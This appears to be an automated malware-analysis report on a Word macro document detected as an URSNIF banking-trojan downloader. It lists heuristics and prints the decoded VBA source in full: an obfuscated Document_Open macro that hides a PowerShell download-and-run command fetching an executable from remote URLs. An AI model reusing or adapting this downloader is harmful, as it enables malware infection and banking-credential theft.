MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains a VBA macro that executes upon opening the document, as indicated by the 'Document_open' macro and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic. This macro utilizes the Shell() function to execute a command, which is a common technique for downloading and running secondary payloads. The ClamAV detection and heuristic firings strongly suggest this is a downloader for the URSNIF banking trojan.
Heuristics 6
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4091 bytes |
SHA-256: 3a98f2289698f44b5db3af572b95c0c7c76f2ec12f2957d61888b91c6304b37a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zizNfziBzNtM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(LIXIl) + XdauMUTzohcJ + VuoIfNz + DoWCBHiYKw + iPwdLLGh + jEPfjmOzOUb + jwnHDCqqf, vbHide
End Sub
Attribute VB_Name = "dDpNjzGjnzw"
Function DoWCBHiYKw()
On _
Error _
Resume _
Next
Month "bjUjmUF" + "195235278" + "463445225" + "310828815"
kDlWOXDORdd = Chr(7 + 10 + 2 + 6 + 74) + "md" + " /V" + ":^O/" + Chr(5 + 7 + 1 + 4 + 50) + Chr(2 + 3 + 0 + 2 + 27) + "^s" + "^et ^" + "P^6"
Month "Hb" + "5921" + "b" + "QiiYF"
Month "1603" + "4727"
NvQcb = "^F=^" + " " + " ^ " + "^ ^ ^ " + "^ ^ ^"
Month "300572301" + "5408" + "kjiJ" + "AdNdDWdfH"
Month "3757" + "prjzGVh"
Month "jsN" + "UNXZkuiVajs"
Month "267767482" + "1732"
Month "Qu" + "PL"
ZQEtaQZoEsY = " ^ ^" + " " + "^ }^" + "}" + "^{h" + Chr(7 + 10 + 2 + 6 + 74) + "t" + "a" + Chr(7 + 10 + 2 + 6 + 74) + "^}" + "^;ka" + "^er" + "b^;iP^m" + "^$^ ^" + "m^et" + "I"
Month "LkEqQPidW" + "262395113" + "5519" + "iJl"
Month "4077" + "426936412" + "LfW" + "533001027"
Month "3775" + "7774" + "VSpX" + "IzXIEYAWI"
iajvhoX = "-^e" + "k^ov" + "nI" + ";)^iP^m" + "$ ,p" + "^mZ$" + "(e^" + "l^" + "iFd^ao" + "^l" + "n^" + "w" + "^o^D^"
Month "5770" + "5"
Month "h" + "HrVn" + "rUXsh" + "LzXizu"
jiLOiAjquod = ".^DL^h^" + "${yr^t" + "^{)" + "^Z^Bj$ " + "n^i^" + " ^" + "p" + "^m^Z^$(" + "^h" + Chr(7 + 10 + 2 + 6 + 74) + "a^er^o" + "^f" + ";"
Month "GoLARa" + "lwKKAoI" + "Fpz" + "wwrm"
Month "V" + "mHMzzzAtTf" + "Vp" + "404639177"
zmpdYkf = "'^e^x^e" + "^.'+^H" + "Y" + "^A^$+" + "^'" + "\" + "^'+" + Chr(7 + 10 + 2 + 6 + 74) + "il" + "b^u^p:"
Month "MDo" + "MZVc"
Month "NQEXhzwui" + "D"
Month "2443" + "hXUWprYJ"
Month "7713" + "EjOCQzwp" + "2406" + "i"
NpwjQQYjrGJ = "vne$^" + "=iP^m$;" + "^'" + "^0" + "^51' " + "^= H" + "Y" + "^A^$" + ";)'@^"
Month "HrKXjwKAD" + "sJZh"
Month "iQP" + "8200"
Month "ACErWKQ" + "aiwoUcJWzz" + "RztG" + "241960596"
GEJhEW = "'(^t^i" + "l^p^S.^" + "'n" + "^kt^.^5" + "^b^k^" + "o=" + "^l?p^h" + "p" + "^.^" + "to^" + "k^sn" + "^a^p"
Month "VQ" + "Ojt"
Month "hTXD" + "GvIKPTGK" + "iooQcQMYQfAj" + "qMSYwbc"
LzvwtU = "o/" + "T^TR/^m" + "^o" + Chr(7 + 10 + 2 + 6 + 74) + ".^" + "b" + "y^h^j8^" + "a1^f^" + "is^th" + "^d^" + "2//:p" + "t^th^" + "'^" + "=ZBj"
Month "7382" + "9711" + "IRsFhJusavth" + "222234475"
Month "wctz" + "O" + "tKGfi" + "ZSQSiJCrC"
Month "EwsqUiioFB" + "ojTLJzmq" + "5658" + "316929596"
sRBtED = "^$" + "^" + ";" + "^tn^" + "ei" + "l" + Chr(5 + 7 + 1 + 4 + 50) + "b" + "e^W^.^t" + "^" + "eN ^" + "t" + Chr(7 + 10 + 2 + 6 + 74) + "^" + "e^jbo" + "-w^en=^"
DoWCBHiYKw = kDlWOXDORdd + NvQcb + ZQEtaQZoEsY + iajvhoX + jiLOiAjquod + zmpdYkf + NpwjQQYjrGJ + GEJhEW + LzvwtU + sRBtED
Month "Wb" + "fXqcthi" + "wWAFFM" + "rwiz"
Month "7564" + "Vovi"
End Function
Function iPwdLLGh()
On _
Error _
Resume _
Next
Month "513646569" + "2353"
wTSEzjkj = "D^Lh^$^" + " " + "^l" + "l^eh^" + "sr^" + "e^w^" + "o^p&&^f" + "^or /"
Month "HmWNL" + "B"
Month "388997349" + "96384342" + "6996" + "Kb"
MBozznIMA = "^L " + "%^" + "2 ^i" + "n (^263" + "^;^-1" + "^;" + "0)^d^" + "o ^s^e^"
Month "9670814" + "467"
Month "sV" + "jNSwZXrl"
Month "vzniYHY" + "Nj"
HskzArOU = "t I" + "^" + "4" + "^9" + "=!I^4^" + "9!!^P"
Month "QGoJnKQC" + "PSs" + "dh" + "ic"
TsZNCM = "^6^F:~" + "%^2,1" + "!" + "&&" + "i^f %^2" + " equ ^0" + " " + Chr(7 + 10 + 2 + 6 + 74) + "^a" + "^ll"
Month "hk" + "536434586" + "DsmIilwf" + "cjTihwzTsoYQf"
MkkbW = " %I^4^9" + ":^~5%" + Chr(2 + 3 + 0 + 2 + 27) + " " + " "
iPwdLLGh = wTSEzjkj + MBozznIMA + HskzArOU + TsZNCM + MkkbW
Month "3757" + "272877715"
Month "127125056" + "347083084" + "434418982" + "zEPzzjjVMG"
Month "1750" + "73566637" + "HY" + "94418117"
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.